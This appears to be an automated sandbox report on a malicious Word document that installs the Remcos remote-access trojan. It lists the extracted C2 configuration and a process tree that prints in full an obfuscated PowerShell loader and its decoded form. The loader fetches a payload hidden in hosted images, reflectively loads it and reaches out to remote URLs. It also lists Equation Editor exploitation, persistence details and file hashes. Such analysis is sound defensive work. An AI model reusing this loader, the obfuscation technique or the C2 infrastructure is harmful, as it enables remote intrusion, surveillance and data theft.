Analysis

  • max time kernel
    149s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2024 14:34

General

  • Target

    DETAILS.docx

  • Size

    558KB

  • MD5

    bb683a0e1b197cab5dce152e9355983f

  • SHA1

    48dab24779ecf13e3c130107e950514e46046c11

  • SHA256

    0eab45741c6d3abdb145b7c928d045dc77cf3def915d017abc388c2c38da8137

  • SHA512

    2ab668822fe5742dc4d69e6f0ffebbc2edf01832d997a414b36db0fad71b1c63dac633358a6ef1b6211df8e367a7e87e533ab20d8b6c29ed82d02ab6449fc7f3

  • SSDEEP

    12288:1IAODfjgJ4h1dPjcXUk+MifcXUk+MiQWHOOkxogMm+JJgiXSV3VNycXUk+Mid:KvY4h7P4XUQXUUWHOOkdMm+JJgioVNPa

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

sembe.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    notess

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Rmc-P0AEMX

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 7 IoCs
  • Abuses OpenXML format to download file from external location
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DETAILS.docx"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2388
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\lovetokissherlipswithlovers.vbs"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2640
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBGDgTreE0DgTreSDgTreDgTrevDgTreDDgTreDgTreODgTreDgTrevDgTreDUDgTreNwDgTreuDgTreDDgTreDgTreNgDgTreuDgTreDUDgTreOQDgTreuDgTreDMDgTreMgDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreTgBFDgTreFcDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FMH/08/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'NEW','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2100
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\NEW.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2284
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of SetWindowsHookEx
              PID:1152

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Exploitation for Client Execution

    1
    T1203

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    2
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      62f8d2fa07134ad7b194793f41604a19

      SHA1

      7d6de03fe9aa000fb70d1a58154a155715dd62a3

      SHA256

      6aa8bdc641e39a0987ceb0a9a06a3c79f14d4309929c9772540f073cd46b7701

      SHA512

      7a0e96b09fbd98a3ae3de183b574a6108b1387ecbac31066d60fac18ee32f78afed6a44ff86271b0b14a95d72d6679b62f410cc4114a1b25f58e29e1d8ace65f

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      e0e9f1418ff79e1617df691112dbac30

      SHA1

      7abb3bce8946ad81e496a9dce00d3b9c085f6fee

      SHA256

      c7dffa76cd98cdd60d0cb98d90f8d341431afb1acb8a2fcbad93a7266809294f

      SHA512

      fa426a740880cea20323824bf791738f2e06c87cc8f2f706a9d49b0ce4911b232a7dc3090980ed34f076b80c0e644d610458a4fe0ae13ab8f8f79ef66c8bf6b9

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{8554A703-E561-4B0C-958E-4B91EA8FA930}.FSD
      Filesize

      128KB

      MD5

      fd22485463c3bc981745edeb7e66accc

      SHA1

      600d7757e39b8a87da80ee4c5795549903e4ce7c

      SHA256

      17132cf151fe03c9cd20dcd068bbd9dca8b29923ef586b1a8c1c34c7e6eb6087

      SHA512

      4b1c6fbab88b48f408d0d3756472230c329953513af8113c73e925a9aa79cbb383afd38a01a0964c59ee510b9ab823ecb10e28ece8d44876257fffe2a78fe8a7

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
      Filesize

      128KB

      MD5

      27a1b8cf494c85815438c6419071f827

      SHA1

      bc805fecd8efaacaf5e68d87cc53acd855e4f8f7

      SHA256

      decb3aba8c47b348eac4f7621070fa1b9474a9f1e3a4399764660c1a625956ac

      SHA512

      a4260277d23239230a27deca7dd6f40e4b071326a37c60f725dbf09ca2956509f5aa83d1516233966baa9e0aa5931acccfe1bc562b7993f4f5e8a172cd15a6a5

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{B630E1FC-F391-420D-B0DF-B53E7C369A6D}.FSD
      Filesize

      128KB

      MD5

      98d34adccf1e60a1a09801219e1b9bf6

      SHA1

      8a622a30076af6b3ccf54d69c67a905307f9dced

      SHA256

      febb73191d3f22d6a907af0c8f3c091449dd408f403448e11000d238b705d0e8

      SHA512

      512daf43b54724b59591069ff17760c917d85affa6350f096b96180dc24a09b0840e4d4f40db22fd517c39c6c90f9049cf7e28e8e89471d87b2faf3447ec7d30

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CTT6L9LH\ireallywantakissfrommywifesheisverybeautifulgirlwhoilovealotsheisreallybeautifulgirleveriseenshe___ismybabygirlmylove[1].doc
      Filesize

      74KB

      MD5

      9278d07272accaf33d132bb6dbf6a7e7

      SHA1

      2baca87c9698a70badda973491cdb8fdc82982d5

      SHA256

      5aebe72f050d5977cccf05c5c21bd56dab2c8caf96b9edcf9b1bcfabcf0702fc

      SHA512

      34efd47cc1960994b46211979e0f2cc158d3a87d1af61e9d904d28481a3313129100c46556caa9c27e9309aac162a354df8893d1211ca85d17947b8daf5c405e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39E0E0AB.emf
      Filesize

      1.4MB

      MD5

      1fcb3f34b5588f6a647a06dff1811bf9

      SHA1

      1f5ef0e6e41c14795decedcefc883ab9000fac9a

      SHA256

      a99e8172248dac0b2a6243d06a862901989857b0c2ecbed5f25ddb0d1a95154e

      SHA512

      47e951583afff444f9adb09beab0d83f9792b46d3e1fabf05d21068218d64b3cba48e2dc22fe0a7bd3252a0e0c8866faa244b5dc3784bd336ecbc9f2924fb2aa

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6FA92D5.emf
      Filesize

      1.4MB

      MD5

      4d59a7e93170340b5ec4009f7fa3ad31

      SHA1

      e07421156dd87789f93f10904118343ca452bbb5

      SHA256

      83473215e5c2160333aa92ea7f9b1276d8ed7dd66afc472dc92c88055d189d7d

      SHA512

      415102ad30df62a63ec47d7b432ab397c2cfc8b6f7fe1e8a7057877379b65d344499089780e089ad2f5c08e3050f4dc2205e7c3c4ffe484c39d067027783ab55

    • C:\Users\Admin\AppData\Local\Temp\CabE975.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarE9A7.tmp
      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\TarEAE5.tmp
      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Local\Temp\{3138B314-3A76-4C00-B8FB-57E64B5FE0A5}
      Filesize

      128KB

      MD5

      c1e5721f5acdb6fcae6439e13493d42a

      SHA1

      85f2c62a2b68362908f7460a282da5736cb71f54

      SHA256

      084aac1aa4d3032c2cb6d9560a845928d8f0a1d0d8f0eaec624fdf309d06016d

      SHA512

      366e8e89d4b44ddb4ff9f30a28f363006e528ba35d17c785704992542822f9d39f1e1a6dd139dfc048b328388bc742d8064ed0a69e3d4ed430bec79ccf2524d5

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      29a19986e77331a3bd09f77bc9f0d60f

      SHA1

      966eae5df29b50f838368d1c4b1fe140912fbe41

      SHA256

      9fca80953c317bcac301b972e69e06ccac9bb28501c9d7c23ce10a884f85b13b

      SHA512

      5431f58099e8438c0ae84f64839b49be0fcacbcb3cecbee50e60fcf98914d908047c53390aa863bae5174ecac7eca6c3486e803f17ad0dcd10bd30d9b5887dbf

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      a6d126c535b033d14a8656a01aa1cb96

      SHA1

      411d37f1e83d46428d0ed3f98fb92d7e09fd4ddf

      SHA256

      0e10a89da7eeeadb755a4251f8f5f977b81c3bd38a13980414486ceaed7adc49

      SHA512

      65de17a9f5e8b6bd35d780110c9db2d526f4d95d24b83869c4158294cda1ae1209ba0cca904a8d8cdc91f3b801c0507d10f15c3d85217117cba4765177fb02cc

    • C:\Users\Admin\AppData\Roaming\lovetokissherlipswithlovers.vbs
      Filesize

      111KB

      MD5

      b6f2e8f16ea682ee7b11b435892d6c35

      SHA1

